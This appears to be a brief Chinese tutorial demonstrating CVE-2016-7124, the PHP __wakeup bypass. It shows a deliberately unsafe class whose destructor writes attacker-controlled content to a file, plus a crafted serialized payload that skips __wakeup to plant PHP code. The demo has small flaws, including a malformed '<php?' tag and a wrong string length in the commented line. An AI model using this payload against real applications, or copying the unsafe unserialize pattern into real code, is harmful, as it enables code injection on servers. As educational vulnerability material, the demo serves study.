0x01 基本原理

CVE-2016-7124,简单来说就是当序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行,Demo如下:

0x02代码演示

<?php
/**
 * Created by PhpStorm.
 * User: 徐超
 * Date: 2018/10/20
 * Time: 下午 08:15
 */

class test{
    var $a = "phpinfo();";
    public function __wakeup()
    {
        $this->a = null;
        // TODO: Implement __wakeup() method.

    }
    public function __destruct()
    {
        // TODO: Implement __destruct() method.
        $fp = fopen("D:\\wakeup.php","w");
        fputs($fp,$this->a);
        fclose($fp);
    }

}
// $b = new test();
//$c = serialize($b);

$d = 'O:4:"test":2:{s:1:"a";s:16:"<php? phpinfo();";}'; #对象属性个数值大于真实值,跳过__wakeup执行,写入文件内容
//$d = 'O:4:"test":1:{s:1:"a";s:10:"<?php phpinfo();";}';  #正常生产的php代码-->>文件内容为空
$e = unserialize($d);
echo "\n\r";

cve

preView